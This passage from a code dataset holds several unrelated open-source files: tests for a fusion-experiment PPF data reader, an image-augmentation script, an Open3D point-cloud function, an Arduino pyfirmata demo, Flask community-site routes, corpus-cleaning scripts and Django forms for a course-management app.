1000)\n    assert np.all(results[q + \"_zstop\"] == los.data[5] / 1000)\n    assert np.all(results[q + \"_ystart\"] == np.zeros_like(los.data[1]))\n    assert np.all(results[q + \"_ystop\"] == np.zeros_like(los.data[1]))\n    assert sorted(results[q + \"_records\"]) == sorted(\n        map(\n            lambda x: get_record(reader, pulse, uid, x[0], x[1], revision),\n            [\n                (\"edg7\", f\"los{q[-1]}\"),\n                (instrument, q),\n                # (instrument, f\"{q[0]}{q[-1]}hi\"),\n            ],\n        )\n    )\n\n\n@given(\n    pulses,\n    times,\n    errors,\n    max_freqs,\n    text(min_size=1),\n    sampled_from(sorted(PPFReader.INSTRUMENT_METHODS.keys())),\n    revisions,\n    lists(text(), min_size=1, unique=True).map(set),\n)\ndef test_general_get(\n    pulse, time_range, error, freq, uid, instrument, revision, quantities\n):\n    \"\"\"Test the generic get method to ensure it calls the correct things.\"\"\"\n    with patch.multiple(\n        \"indica.readers.PPFReader\",\n        get_thomson_scattering=DEFAULT,\n        get_charge_exchange=DEFAULT,\n        get_equilibrium=DEFAULT,\n        get_cyclotron_emissions=DEFAULT,\n        get_radiation=DEFAULT,\n        get_bremsstrahlung_spectroscopy=DEFAULT,\n    ), patch(\"indica.readers.ppfreader.SALClient\", JETFakeSALClient):\n        reader = PPFReader(\n            pulse,\n            *time_range,\n            default_error=error,\n            max_freq=freq,\n            selector=MagicMock(),\n            session=MagicMock(),\n        )\n        results = reader.get(uid, instrument, revision, quantities)\n        assert isinstance(results, MagicMock)\n        getattr(reader, reader.INSTRUMENT_METHODS[instrument]).assert_called_once_with(\n            uid, instrument, revision, quantities\n        )\n\n\n@given(\n    pulses,\n    times,\n    errors,\n    max_freqs,\n    just(\"jetppf\"),\n    sampled_from(sorted(PPFReader.INSTRUMENT_METHODS.keys())),\n    integers(),\n    edited_revisions,\n)\ndef test_get_revision(\n    pulse,\n    time_range,\n    error,\n    freq,\n    uid,\n    instrument,\n    revision,\n    available_revisions,\n):\n    \"\"\"Test that _get_revision resolves the requested revision correctly.\"\"\"\n    reader = patched_ppf_reader(\n        pulse,\n        *time_range,\n        default_error=error,\n        max_freq=freq,\n        selector=MagicMock(),\n    )\n    reader._client._revisions = available_revisions\n    if revision < 0:\n        with pytest.raises(sal.core.exception.InvalidPath):\n            reader._get_revision(uid=uid, instrument=instrument, revision=revision)\n    elif 0 < revision < available_revisions[0]:\n        with pytest.raises(sal.core.exception.NodeNotFound):\n            reader._get_revision(uid=uid, instrument=instrument, revision=revision)\n    else:\n        expected_revision = reader._client.list(\n            f\"/pulse/{reader.pulse:d}/ppf/signal/{uid}/{instrument}:{revision:d}\"\n        ).revision_current\n        assert (\n            reader._get_revision(uid=uid, instrument=instrument, revision=revision)\n            == expected_revision\n        )\n\n\n@given(\n    pulses,\n    times,\n    errors,\n    max_freqs,\n    just(\"jetppf\"),\n    sampled_from([\"bolo\", \"efit\", \"lidr\", \"eftp\", \"cxg6\"]),\n    revisions,\n)\ndef test_cache_read_write(\n    pulse,\n    time_range,\n    error,\n    freq,\n    uid,\n    instrument,\n    revision,\n):\n    \"\"\"Test that reading a cache produces the same data that was written to it.\"\"\"\n    with patch(\"indica.readers.ppfreader.SALClient\", JETFakeSALClient):\n        reader = PPFReader(\n            pulse,\n            *time_range,\n            default_error=error,\n            max_freq=freq,\n            selector=MagicMock(),\n            session=MagicMock(),\n        )\n    quantity = sorted(reader.available_quantities(instrument).keys())[0]\n    with tempfile.TemporaryDirectory() as tmpdir:\n        salpath = reader.get_sal_path(uid, instrument, quantity, revision)\n        path = pathlib.Path(tmpdir) / reader._sal_path_to_file(salpath).name\n        data = reader._client.get(salpath)\n        reader._write_cached_ppf(path, data)\n        data2 = 
reader._read_cached_ppf(path)\n        np.testing.assert_equal(data.data, data2.data)\n\n\n@contextmanager\ndef cachedir():\n    \"\"\"Set up a fake cache directory for the cache tests.\n\n    \"\"\"\n    import indica.readers.ppfreader as ppfreader\n\n    old_cache = ppfreader.CACHE_DIR\n    userdir = os.path.expanduser(\"~\")\n    with tempfile.TemporaryDirectory(dir=userdir) as new_cache:\n        ppfreader.CACHE_DIR = os.path.relpath(new_cache, userdir)\n        try:\n            yield ppfreader.CACHE_DIR\n        finally:\n            ppfreader.CACHE_DIR = old_cache\n\n\n@given(\n    pulses,\n    times,\n    errors,\n    max_freqs,\n    just(\"jetppf\"),\n    sampled_from([\"bolo\", \"efit\", \"lidr\", \"eftp\", \"cxg6\"]),\n    revisions,\n)\ndef test_get_signal_from_cache(\n    pulse,\n    time_range,\n    error,\n    freq,\n    uid,\n    instrument,\n    revision,\n):\n    \"\"\"Test that signals are served from the cache and the client is not queried again.\"\"\"\n    with patch(\"indica.readers.ppfreader.SALClient\", JETFakeSALClient):\n        reader = PPFReader(\n            pulse,\n            *time_range,\n            default_error=error,\n            max_freq=freq,\n            selector=MagicMock(),\n            session=MagicMock(),\n        )\n    quantity = sorted(reader.available_quantities(instrument).keys())[0]\n    with cachedir() as cdir:\n        data, salpath = reader._get_signal(uid, instrument, quantity, revision)\n        path = reader._sal_path_to_file(salpath)\n        assert pathlib.Path.home() / cdir in path.parents\n        data2 = reader._read_cached_ppf(path)\n        np.testing.assert_equal(data.data, data2.data)\n        with patch.object(reader._client, \"get\") as mock_get:\n            data3, _ = reader._get_signal(uid, instrument, quantity, revision)\n            mock_get.assert_not_called()\n            np.testing.assert_equal(data.data, data3.data)\n\n\ndef test_cache_read_bad_permissions():\n    \"\"\"Check that reading cached data fails if other users are allowed to\n    write to the file. This is done for security reasons.\"\"\"\n    with patch(\"indica.readers.ppfreader.SALClient\", JETFakeSALClient):\n        reader = PPFReader(0, 0.0, 0.0)\n    with tempfile.NamedTemporaryFile(\"w\") as cachefile:\n        path = pathlib.Path(cachefile.name)\n        cachefile.write(\"Just some text so the file is not empty.\")\n        path.chmod(0o777)\n        with pytest.warns(PPFWarning, match=\"writeable\"):\n            result = reader._read_cached_ppf(path)\n        assert result is None\n","repo_name":"ukaea/Indica","sub_path":"tests/unit/readers/test_ppf_reader.py","file_name":"test_ppf_reader.py","file_ext":"py","file_size_in_byte":27283,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"12222023827","text":"import os\nimport gc\nimport cv2\nimport zipfile\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimport torch\nfrom torchvision import transforms\n\n\"\"\"\nGoal: increase the number of images.\nData augmentation methods used:\n    1. Rotation by 180 degrees\n    2. CenterCrop\n    3. RandomCrop\n    4. ColorJitter Contrast\n    5. Mixout\nOverall procedure:\n    1. Load the original images and mask images\n    2. Apply data augmentation to the images\n    3. Save the resulting images\n\"\"\"\n\nzipfile_path = \"./SEG_Train_Mask_Images_Dataset_20220509_Width_Height.zip\"\ncrop_shape = (928, 1696)\n\ndef Rotation_image(original_img: np.array, mask_img: np.array):\n    rotation_transform = transforms.Compose([\n        transforms.RandomRotation((180, 180))\n    ])\n    \n    original_img = torch.from_numpy(original_img.transpose((2, 0, 1)) / 255)\n    mask_img = torch.from_numpy(mask_img.transpose((2, 0, 1)) / 255)\n\n    rotation_original_img = rotation_transform(original_img)\n    rotation_mask_img = rotation_transform(mask_img)\n\n    rotation_original_img = (rotation_original_img.detach().numpy().transpose((1, 2, 0)) * 255).astype(np.uint8)\n    rotation_mask_img = np.where(rotation_mask_img.detach().numpy().transpose((1, 2, 0)) * 255 > 150, 255, 0).astype(np.uint8)\n    return rotation_original_img, rotation_mask_img\n\ndef CenterCrop_image(original_img, mask_img):\n    centercrop_transform = transforms.Compose([\n        transforms.CenterCrop(size = crop_shape)\n    ])\n\n    original_img = torch.from_numpy(original_img.transpose((2, 0, 1)) / 255)\n    mask_img = torch.from_numpy(mask_img.transpose((2, 0, 1)) / 255)\n\n    centercrop_original_img = centercrop_transform(original_img)\n    centercrop_mask_img = centercrop_transform(mask_img)\n\n    centercrop_original_img = (centercrop_original_img.detach().numpy().transpose((1, 2, 0)) * 255).astype(np.uint8)\n    centercrop_mask_img = np.where(centercrop_mask_img.detach().numpy().transpose((1, 2, 0)) * 255 > 150, 255, 0).astype(np.uint8)\n    return centercrop_original_img, centercrop_mask_img\n\ndef RandomCrop_image():\n    # Placeholder: random cropping has not been implemented yet.\n    return\n\n\ndef HorizontalFlip_image(original_img: np.array, mask_img: np.array):\n    HorizontalFlip_transform = transforms.Compose([\n        transforms.RandomHorizontalFlip(p = 1)\n    ])\n\n    original_img = torch.from_numpy(original_img.transpose((2, 0, 1)) / 255)\n    mask_img = torch.from_numpy(mask_img.transpose((2, 0, 1)) / 255)\n\n    horizontal_original_img = HorizontalFlip_transform(original_img)\n    horizontal_mask_img = HorizontalFlip_transform(mask_img)\n\n    horizontal_original_img = (horizontal_original_img.detach().numpy().transpose((1, 2, 0)) * 255).astype(np.uint8)\n    horizontal_mask_img = np.where(horizontal_mask_img.detach().numpy().transpose((1, 2, 0)) * 255 > 150, 255, 0).astype(np.uint8)\n    return horizontal_original_img, horizontal_mask_img\n\ndef ColorJitter_brightness(original_img: np.array, mask_img: np.array, brightness_num: int = 2):\n    colorJitter_brightness_transform = transforms.Compose([\n        transforms.ColorJitter(brightness = brightness_num)\n    ])\n    original_img = torch.from_numpy(original_img.transpose((2, 0, 1)) / 255)\n\n    colorJitter_brightness_img = colorJitter_brightness_transform(original_img)\n\n    colorJitter_brightness_img = (colorJitter_brightness_img.detach().numpy().transpose((1, 2, 0)) * 255).astype(np.uint8)\n    return colorJitter_brightness_img, mask_img\n\ndef ColorJitter_contrast(original_img: np.array, mask_img: np.array, contrast_num: int = 4):\n    colorJitter_contrast_transform = transforms.Compose([\n        transforms.ColorJitter(contrast = contrast_num)\n    ])\n    original_img = torch.from_numpy(original_img.transpose((2, 0, 1)) / 255)\n\n    colorJitter_contrast_img = colorJitter_contrast_transform(original_img)\n\n    colorJitter_contrast_img = (colorJitter_contrast_img.detach().numpy().transpose((1, 2, 0)) * 255).astype(np.uint8)\n    return colorJitter_contrast_img, mask_img\n\ndef mixout_two_images(original_image1, original_image2, mask_image1, mask_image2, lmbda: float):\n    \n    mixout_two_images = lmbda * original_image1 / 255 + (1-lmbda) * 
original_image2 / 255\n    mixout_two_mask = lmbda * mask_image1 / 255 + (1-lmbda) * mask_image2 / 255\n\n    return mixout_two_images, mixout_two_mask\n\n\n### Step1. Load the original images and mask images (final image shape = (W, H, C)) ###\nzipData = zipfile.ZipFile(zipfile_path)\noriginal_image_name = [i for i in zipData.namelist() if \"mask\" not in i and \".jpg\" in i]\nmask_image_name = [i for i in zipData.namelist() if \"mask\" in i and \".jpg\" in i]\n\noriginal_image = [plt.imread(zipData.open(i)) for i in original_image_name]\nmask_image = [plt.imread(zipData.open(i))[:, :, np.newaxis] for i in mask_image_name]\n### Step1. Load the original images and mask images (final image shape = (W, H, C)) ###\n\n### Step2. Data Augmentation ###\n\n# Rotation\nrotation_original_mask = [Rotation_image(original_img = original_img, mask_img = mask_img) for original_img, mask_img in zip(original_image, mask_image)]\noriginal_image += [i[0] for i in rotation_original_mask]\nmask_image += [i[1] for i in rotation_original_mask]\ndel rotation_original_mask\ngc.collect()\n\n# # CenterCrop \n# CenterCrop_original_mask = [CenterCrop_image(original_img = original_img, mask_img = mask_img) for original_img, mask_img in zip(original_image, mask_image)]\n# original_image += [i[0] for i in CenterCrop_original_mask]\n# mask_image += [i[1] for i in CenterCrop_original_mask]\n# del CenterCrop\n\n# ColorJitter Brightness and Contrast\n# ColorJitter_Brightness_original_mask = [ColorJitter_brightness(original_img = original_img, mask_img = mask_img) for original_img, mask_img in zip(original_image, mask_image)]\nColorJitter_Contrast_original_mask = [ColorJitter_contrast(original_img = original_img, mask_img = mask_img) for original_img, mask_img in zip(original_image, mask_image)]\noriginal_image += [i[0] for i in ColorJitter_Contrast_original_mask] # + [i[0] for i in ColorJitter_Brightness_original_mask]\nmask_image += [i[1] for i in ColorJitter_Contrast_original_mask] # + [i[1] for i in ColorJitter_Brightness_original_mask]\ndel ColorJitter_Contrast_original_mask\ngc.collect()\n\n# Mixout augmentation\nlmbda = 0.5\nhalf_number = (original_image.__len__() // 4) + 1\nmixout_original_mask = [mixout_two_images(original_image1 = original_image[i_index], \n                                          original_image2 = original_image[j_index],\n                                          mask_image1 = mask_image[i_index],\n                                          mask_image2 = mask_image[j_index],\n                                          lmbda = lmbda) for i_index, j_index in zip(range(half_number), range(half_number, int(half_number*2-2)))]\noriginal_image += [i[0] for i in mixout_original_mask] # + [i[0] for i in ColorJitter_Brightness_original_mask]\nmask_image += [i[1] for i in mixout_original_mask] # + [i[1] for i in ColorJitter_Brightness_original_mask]\ndel mixout_original_mask\ngc.collect()\n### Step2. Data Augmentation ###\n\n### Step3. ###\n\nif \"Train_images\" not in os.listdir(\".//\"):\n    os.mkdir(\"Train_images\")\n\nif \"Train_Mask\" not in os.listdir(\".//\"):\n    os.mkdir(\"Train_Mask\")\n\n# Step4. Load each image and its .json one by one\nfor file_name, (one_image, one_mask) in enumerate(zip(original_image, mask_image)):\n\n    # Step7. Write out the image and its mask\n    one_image = cv2.cvtColor(one_image, cv2.COLOR_RGB2BGR)\n    cv2.imwrite(f\"Train_images/{file_name}.jpg\", one_image)\n    cv2.imwrite(f\"Train_Mask/{file_name}.jpg\", one_mask)\n### Step3. 
###\n","repo_name":"Wang-Jian-An/Segmentation-for-Lung-adenocarcinoma-pathological","sub_path":"3-data_augumentation.py","file_name":"3-data_augumentation.py","file_ext":"py","file_size_in_byte":7499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18691984760","text":"# Written by Hayatu Abdullahi\r\n\r\n\r\nfrom PIL import ImageTk, Image\r\nimport cv2\r\nimport os\r\nimport torch\r\nimport copy\r\nfrom os.path import splitext\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport open3d as o3d\r\n#from main import depth_map\r\n#from Dependencies.read_write_model import read_model, read_next_bytes, read_cameras_text, read_cameras_binary, read_images_binary, read_array, write_array, qvec2rotmat\r\n\r\n\r\n\r\n# Generate and visualize a 3D point cloud of the environment from the image perspective \r\ndef point_cloud(depth_map, img4, depth, fx, fy):\r\n\r\n\r\n \r\n depthz = depth_map\r\n #depthz = depth_map[:, :, 0]\r\n #print('Updated Depth:'. depthz.shape)\r\n #print(depthz.shape)\r\n #colors = []\r\n poi= []\r\n points= []\r\n colu = []\r\n\r\n# This function predefines the formula and computes the pixels faster due to pre processing\r\n centeru = depthz.shape[1] / 2\r\n centerv = depthz.shape[0] / 2\r\n height = depthz.shape[0]\r\n width = depthz.shape[1]\r\n \r\n row = np.arange(0, width, 1)\r\n u = np.array([row for i in np.arange(height)])\r\n col = np.arange(0, height, 1)\r\n v = np.array([col for i in np.arange(width)])\r\n v = v.transpose(1, 0)\r\n #color.append(rgb.getpixel((u, v)))\r\n \r\n #wid, hei = rgb.size\r\n colors = list(img4.getdata())\r\n #print('Pixel val:' ,len(pixel_values))\r\n\r\n # Normalizes the points with the camera intrinsic parameters\r\n x = (u - centeru) * depthz / fx\r\n y = (v - centerv) * depthz / fy\r\n\r\n # Divide the depth to compensate for the low resolution input image and depth for monocular depth model\r\n z = depthz/6\r\n #z = depthz / depthz.max() * x.max()\r\n #u = np.int\r\n #print(u)\r\n #print(v)\r\n \r\n \r\n #colors = colors[0:3]\r\n \r\n x = np.reshape(x, (width * height, 1)).astype(float)\r\n y = np.reshape(y, (width * height, 1)).astype(float)\r\n z = np.reshape(z, (width * height, 1)).astype(float)\r\n\r\n points = np.concatenate((x, y, z), axis=1)\r\n\r\n\r\n # This function loops through every pixel on the image to modify and manipulate depth. 
However, depending on the number of pixels, it can be very slow\r\n    #for v in range(depthz.shape[0]):\r\n        #for u in range(depthz.shape[1]):\r\n\r\n            # Access the depth(Z) axis of the image for every pixel\r\n            #Z = depthz[v, u]/5 \r\n\r\n            #Only plot the depth from a specific point away from the camera\r\n            #if (Z > depth):\r\n\r\n                #X = (u - centeru) * Z / fx\r\n                #Y = (v - centerv) * Z / fy\r\n                #points.append((X, Y, Z))\r\n                #colors.append(img4.getpixel((u, v)))\r\n\r\n            #else:\r\n                #pass\r\n\r\n\r\n    # Convert list to Numpy array\r\n    points = np.asarray(points)\r\n    #print('Camera Bin', camera_bin)\r\n\r\n    #K = np.asarray(camera_bin)\r\n    # intrinsics\r\n    K = np.identity(3)\r\n    K[0, 0] = fx\r\n    K[1, 1] = fy\r\n    #K[0, 2] = cx\r\n    #K[1, 2] = cy\r\n    #print('K', K)\r\n    #print('k shape', K.shape)\r\n    #print('k dim', K.ndim)\r\n\r\n    \r\n    #print('Points V1:', points.shape)\r\n    #points2 = np.concatenate((x, y, z, np.ones_like(x)), axis=1)\r\n\r\n\r\n    #rot = np.ones((3,3))\r\n    #reshape(3,3)\r\n    #print(rot)\r\n    \r\n    \r\n    \r\n\r\n    colors = np.asarray(colors)\r\n    print('Colors Size:', len(colors))\r\n    print('Point Size:', len(points))\r\n\r\n    \r\n    pcd = o3d.geometry.PointCloud()\r\n\r\n    pcd.points = o3d.utility.Vector3dVector(points)\r\n    pcd.colors = o3d.utility.Vector3dVector(colors/255)\r\n\r\n    # Transforms and flips the world space to rectify the inversion\r\n    pcd.transform([[1, 0, 0, 0], [0, -1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]])\r\n\r\n    \r\n    #mesh_t = copy.deepcopy(pcd).transform(Matrix)\r\n    \r\n    #o3d.visualization.draw_geometries([pcd, mesh_t])\r\n    #o3d.visualization.draw_geometries([pcd])\r\n\r\n    return pcd\r\n    \r\n    ","repo_name":"hayatuabdul/Foreground-Remover-Msc-Project","sub_path":"Visualization/point_cloud1.py","file_name":"point_cloud1.py","file_ext":"py","file_size_in_byte":3826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3408889808","text":"from pyfirmata import Arduino, util\n\nboard = Arduino('/dev/ttyUSB0') # connect to the board attached to this serial port\n\nboard.digital[2].write(1) # access digital pin 2 and write the value 1 == digitalWrite(2,HIGH)\nprint(board.digital[2].read()) # read the value of digital pin 2\n\n# a more systematic way of accessing a pin\npin2 = board.get_pin('d:2:o') # create a variable representing digital pin 2 as an output\npin2.write(1) # now use that variable\n\n\n# access to analog pins\nit = util.Iterator(board)\nit.start() # keeps the analog values updated\nboard.analog[0].enable_reporting()\nprint(board.analog[0].read()) # print the value\n\n# The other way of accessing it\nanalog_0 = board.get_pin('a:0:i') # read the analog value of A0\nprint(analog_0.read())\n\n# PWM access\npin3PWM = board.get_pin('d:3:p') # pin 3 with PWM access\npin3PWM.write(0.6) # set the pin to 60%\n","repo_name":"javacasm/RaspberryOnline2ed","sub_path":"codigo/test_firmdata.py","file_name":"test_firmdata.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"74948453209","text":"from flask import render_template, request, flash, redirect, url_for, abort\nfrom comunidade import app, bcrypt\nfrom comunidade.forms import FormLogin, FormCriarConta, FormEditarPerfil, FormCriarPost\nfrom comunidade.models import Usuario, Post, db\nfrom flask_login import login_user, logout_user, current_user, login_required\n\ndb.create_all()\ndb.session.commit()\n\n@app.route('/')\ndef home():\n    
posts = Post.query.order_by(Post.id)\n    return render_template('home.html', posts=posts)\n\n\n@app.route('/contato')\ndef contato():\n    return render_template('contato.html')\n\n\n@app.route('/usuarios')\n@login_required\ndef usuarios():\n    usuarios = Usuario.query.all()\n    return render_template('usuarios.html', usuarios=usuarios)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n    form_criarconta = FormCriarConta()\n    form_login = FormLogin()\n    if form_login.validate_on_submit() and 'botao_submit_login' in request.form:\n        usuario = Usuario.query.filter_by(email=form_login.email.data).first()\n        if usuario and bcrypt.check_password_hash(usuario.senha, form_login.senha.data):\n            login_user(usuario, remember=form_login.lembrar_login.data)\n            flash(f'Login feito com sucesso no email: {form_login.email.data}', 'alert-success')\n            parametro_url = request.args.get('next')\n            if parametro_url:\n                return redirect(parametro_url)\n            else:\n                return redirect(url_for('home'))\n        else:\n            flash('Falha no login, senha incorreta.', 'alert-info')\n    # else:\n    #     flash('Falha no login, email incorreto.', 'alert-danger')\n    if form_criarconta.validate_on_submit() and 'botao_submit_criarconta' in request.form:\n        senha_crypt = bcrypt.generate_password_hash(form_criarconta.senha.data).decode('utf8')  # decode so the hash is stored correctly in the database\n        usuario = Usuario(username=form_criarconta.username.data, email=form_criarconta.email.data, senha=senha_crypt)\n        db.session.add(usuario)\n        db.session.commit()\n        flash(f'Conta criada com sucesso para o email: {form_criarconta.email.data}', 'alert-success')\n        return redirect(url_for('home'))\n    return render_template('login.html', form_login=form_login, form_criarconta=form_criarconta)\n\n\n@app.route('/sair')\n@login_required\ndef sair():\n    logout_user()\n    flash('Logout feito com sucesso', 'alert-success')\n    return redirect(url_for('home'))\n\n\n@app.route('/post/criar', methods=['GET', \"POST\"])\n@login_required\ndef criar_post():\n    form = FormCriarPost()\n    if form.validate_on_submit():\n        post = Post(titulo=form.titulo.data, corpo=form.corpo.data, autor=current_user)\n        post.save_new_data()\n        db.session.add(post)\n        db.session.commit()\n        return redirect(url_for('home'))\n    return render_template('criarpost.html', form=form)\n\n\n@app.route('/perfil')\n@login_required\ndef meu_perfil():\n    foto_perfil = url_for('static', filename=f'fotos_perfil/{current_user.foto_perfil}')\n    return render_template('meuperfil.html', foto_perfil=foto_perfil)\n\n\n@app.route('/perfil/editar', methods=['GET', 'POST'])\n@login_required\ndef editar_perfil():\n    form = FormEditarPerfil()\n    if form.validate_on_submit():\n        current_user.email = form.email.data\n        current_user.username = form.username.data\n        if form.foto_perfil.data:\n            current_user.salvar_foto(form.foto_perfil.data)\n        current_user.atualizar_cursos(form)\n        db.session.commit()\n        flash('Perfil atualizado com sucesso', 'alert-success')\n        return redirect(url_for('meu_perfil'))\n    elif request.method == 'GET':\n        form.email.data = current_user.email\n        form.username.data = current_user.username\n        checks = [check for check in form if 'curso_' in check.name]\n        for check in checks:\n            if check.label.text in current_user.cursos:\n                check.data = True\n    foto_perfil = url_for('static', filename=f'fotos_perfil/{current_user.foto_perfil}')\n    return render_template('editarperfil.html', foto_perfil=foto_perfil, form=form)\n\n\n@app.route('/post/<post_id>', methods=['GET', 'POST'])\ndef post(post_id):\n    post = Post.query.get(post_id)\n    if 
current_user == post.autor:\n        form = FormCriarPost()\n        if request.method == 'GET':\n            form.titulo.data = post.titulo\n            form.corpo.data = post.corpo\n        elif form.validate_on_submit():\n            post.titulo = form.titulo.data\n            post.corpo = form.corpo.data\n            db.session.commit()\n            flash('Post Atualizado com sucesso', 'alert-success')\n            return redirect(url_for('home'))\n    else:\n        form = None\n    return render_template('post.html', post=post, form=form)\n\n\n@app.route('/post/<post_id>/excluir', methods=['GET', 'POST'])\ndef excluir_post(post_id):\n    post = Post.query.get(post_id)\n    if current_user == post.autor:\n        db.session.delete(post)\n        db.session.commit()\n        flash('Post excluído com sucesso!', 'alert-danger')\n        return redirect(url_for('home'))\n    else:\n        abort(403)\n","repo_name":"arturjoaquim/site-comunidade","sub_path":"comunidade/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5137,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"40991727071","text":"# -*- coding: utf-8 -*-\r\nfrom pyltp import SentenceSplitter\r\nfrom bs4 import BeautifulSoup\r\nimport os\r\nimport re\r\nimport csv,operator\r\nfrom pypinyin import lazy_pinyin\r\n\r\n\r\ndef DisposeOrignalFile():\r\n    pathHead=\"E:\\\\医疗保险语料库\\\\医疗保险语料原文\"\r\n    txtpath=\"E:\\\\MedicareCorpus2\"\r\n    pathdirs=os.listdir(pathHead)\r\n    # print(pathdirs)\r\n    k=1\r\n    filedir=[]\r\n    for dir in pathdirs:\r\n        pathdir=pathHead+\"\\\\\"+str(dir)\r\n        # print(pathdir)\r\n        filedirs=os.listdir(pathdir)\r\n        # print(filedirs)\r\n        for files in filedirs:\r\n            filedir.append(pathdir+\"\\\\\"+files)\r\n    print(filedir)\r\n    for file in filedir:\r\n        try:\r\n            f=open(file,'r',encoding='utf-8')\r\n            bsobj=BeautifulSoup(f,\"html.parser\")\r\n            # open the temporary file\r\n            p=txtpath+\"\\\\tempfile.txt\"\r\n            fileobject=open(p,'w',encoding='utf-8')\r\n            fileobject.write(bsobj.text)\r\n            fileobject.close()\r\n            fileobject = open(p, 'r', encoding='utf-8')\r\n            # clean the temporary file and write it to the final file\r\n            fpath = txtpath + \"\\\\\" + str(k) + \".txt\"\r\n            finalfile = open(fpath, 'w', encoding='utf-8')\r\n            for line in fileobject.readlines():\r\n                sents = SentenceSplitter.split(line)\r\n                for s in sents:\r\n                    data = s.strip()\r\n                    data = data.strip('\\n')\r\n                    if len(data) != 0:\r\n                        finalfile.write(data + '\\n')\r\n        except UnicodeDecodeError:\r\n            print(file+\"解析失败\")\r\n            continue\r\n        fileobject.close()\r\n        k=k+1\r\n        f.close()\r\n    finalfile.close()\r\n\r\ndef CleanSentence(sentence):\r\n    \"\"\"\r\n    Clean a sentence.\r\n    :param sentence: the sentence to be cleaned\r\n    :return:\r\n    \"\"\"\r\n    pattern = [r'第.*(条|章)', r'([0-9]{1,2})', r'((一|二|三|四|五|六|七|八|九|十)*)', r'[0-9]{1,2}(\\.|\\.)'\r\n        , r'(一|二|三|四|五|六|七|八|九|十|[0-9])+(、|\\.|\\.)', r'(◆|)', r'(?.(府|政|国|法|字|发|办|综)+.[0-9]+.综?[0-9]+号)?']\r\n    for p in pattern:\r\n        sentence = re.sub(p, '', sentence)\r\n    sentence = re.sub(r'( | )+', '\\n', sentence)\r\n    # print(sentence)\r\n    return sentence\r\n\r\ndef Dictionary():\r\n    file = open('E:\\\\医疗保险语料库\\\\领域词典.txt', 'r', encoding='utf-8')\r\n    words = set()\r\n    for line in file.readlines():\r\n        words.add(line)\r\n    file.close()\r\n    file2 = open('E:\\\\医疗保险语料库\\\\领域词典.txt', 'w', encoding='utf-8')\r\n    for w in words:\r\n        s = w.strip('\\n')+ ' n'+ '\\n'\r\n        print(s)\r\n        file2.write(s)\r\n    file2.close()\r\n\r\ndef PrepareText():\r\n    filepath = 'E:\\\\MedicareCorpus2\\\\'\r\n    efilepath = 'E:\\\\实体抽取\\\\'\r\n    outpath = 'E:\\\\医疗保险语料待解析\\\\'\r\n    files = os.listdir(filepath)\r\n    for file in files:\r\n        print(file)\r\n        entities = []\r\n        foj = open(filepath + file, 'r', encoding = 'utf-8')\r\n        efoj = open(efilepath + file, 
'r', encoding = 'utf-8')\r\n for e in efoj.readlines():\r\n entities.append(e.strip('\\n'))\r\n sentences = []\r\n for line in foj.readlines():\r\n for e in entities:\r\n if line.find(e) != -1:\r\n line = CleanSentence(line)\r\n line = line.strip()\r\n if len(line) > 1:\r\n sentences.append(line.strip('\\n'))\r\n break\r\n with open(outpath + file, 'w', encoding='utf-8') as f:\r\n for s in sentences:\r\n f.write(s + '\\n')\r\n foj.close()\r\n efoj.close()\r\n\r\ndef PrepareEntity(filename):\r\n entities = set()\r\n with open(filename, 'r', encoding='utf-8') as f:\r\n for line in f.readlines():\r\n entities.add(line.strip('\\n'))\r\n # for e in entities2:\r\n # entities.add(e)\r\n en = []\r\n for e in entities:\r\n en.append(e)\r\n en.sort(key=lambda x: len(x), reverse=True)\r\n with open(filename, 'w', encoding='utf-8') as ff:\r\n for e in en:\r\n ff.write(e + '\\n')\r\n\r\ndef SortCSVfile(filename):\r\n data = csv.reader(open(filename, 'r', encoding='utf-8'))\r\n sortedlist = sorted(data, key=lambda x:(lazy_pinyin(x[0])[0], lazy_pinyin(x[1])[0],lazy_pinyin(x[2])[0]))\r\n with open(filename, 'w', encoding='utf-8') as f:\r\n filewriter = csv.writer(f)\r\n for row in sortedlist:\r\n filewriter.writerow(row)\r\n f.close()\r\n\r\n# SortCSVfile('E:\\\\哈尔滨市.csv')\r\nfilepath = 'E:\\\\实体关系抽取\\\\'\r\nfiles = os.listdir(filepath)\r\n\r\nfor file in files:\r\n print(file)\r\n filename = filepath + file\r\n SortCSVfile(filename)\r\n\r\n\r\n\r\n\r\n","repo_name":"AdiaLoveTrance/MedicalInsuranceKG","sub_path":"FileDispose.py","file_name":"FileDispose.py","file_ext":"py","file_size_in_byte":4746,"program_lang":"python","lang":"en","doc_type":"code","stars":116,"dataset":"github-code","pt":"31"} +{"seq_id":"19938853561","text":"from django import forms\nfrom django.forms.models import inlineformset_factory\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.contrib.auth.models import User\n\nfrom apps.main.forms import GeoForm\nfrom apps.cyd.models import (\n Curso, CrAsistencia, CrHito, Sede, Grupo, Participante, Asesoria)\n\n\nclass CursoForm(forms.ModelForm):\n class Meta:\n model = Curso\n fields = '__all__'\n\n\nCrHitoFormSet = inlineformset_factory(\n Curso,\n CrHito,\n fields='__all__',\n extra=10,\n can_delete=True)\nCrAsistenciaFormSet = inlineformset_factory(\n Curso,\n CrAsistencia,\n fields='__all__',\n extra=10,\n can_delete=True)\n\n\nclass SedeForm(forms.ModelForm):\n capacitador = forms.ModelChoiceField(\n queryset=User.objects.filter(groups__name='cyd_capacitador'),\n empty_label=None)\n lat = forms.CharField(max_length=25, required=False)\n lng = forms.CharField(max_length=25, required=False)\n\n class Meta:\n model = Sede\n fields = '__all__'\n exclude = ('mapa',)\n widgets = {\n 'municipio': forms.Select(attrs={'class': 'select2'})\n }\n\n def __init__(self, *args, **kwargs):\n capacitador = kwargs.pop('capacitador', None)\n super(SedeForm, self).__init__(*args, **kwargs)\n if capacitador:\n self.fields['capacitador'].queryset = 